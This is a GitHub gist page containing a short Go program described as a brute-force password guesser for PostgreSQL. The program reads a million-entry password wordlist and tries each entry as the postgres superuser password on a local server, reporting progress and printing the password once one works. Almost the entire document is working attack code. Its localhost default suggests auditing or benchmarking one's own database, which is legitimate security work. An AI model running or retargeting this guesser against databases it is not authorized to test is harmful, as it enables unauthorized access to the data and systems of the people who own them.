Skip to content

Instantly share code, notes, and snippets.

@kmoppel
Last active October 11, 2023 21:49
Show Gist options
  • Save kmoppel/4f29d6bd22d80a2c627195059388b64d to your computer and use it in GitHub Desktop.
Save kmoppel/4f29d6bd22d80a2c627195059388b64d to your computer and use it in GitHub Desktop.
Brute force password guesser for Postgres
package main
import (
"bufio"
"fmt"
"log"
"net/url"
"os"
"time"
"database/sql"
_ "github.com/lib/pq"
)
var connStr string = "postgresql://postgres:%s@localhost:5432/postgres?sslmode=disable"
var pwFile string = "top-1m-pw.txt"
func getPostgresDBConnection(libPqConnString string) (*sql.DB, error) {
var err error
var db *sql.DB
db, err = sql.Open("postgres", libPqConnString)
if err != nil {
return nil, err
}
return db, err
}
func main() {
var curTime time.Time
start_time := time.Now()
lastProgressMsg := start_time
attempts := 0
var pwd string
var t *url.URL
f, err := os.OpenFile(pwFile, os.O_RDONLY, os.ModePerm)
if err != nil {
log.Fatalf("open file error: %v", err)
}
rd := bufio.NewReader(f)
for {
pwd, err = rd.ReadString('\n')
if pwd == "" || err != nil {
log.Fatalf("exiting. pwd: %s, err: %v", pwd, err)
}
t = &url.URL{Path: string(pwd[:len(pwd)-1])} // password can include funny chars which need escaping
conn, err := getPostgresDBConnection(fmt.Sprintf(connStr, t.String()))
if err != nil {
log.Fatal("failed to initialize conn", err)
}
err = conn.Ping()
attempts++
curTime = time.Now()
if err != nil {
// quite expected...
} else {
fmt.Println("password MATCH:", pwd)
fmt.Println("attempts:", attempts)
fmt.Println("runtime:", curTime.Sub(start_time))
return
}
if lastProgressMsg.Before(curTime.Add(time.Second * -10)) {
fmt.Println("attempts:", attempts)
fmt.Println("runtime:", curTime.Sub(start_time))
lastProgressMsg = curTime
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment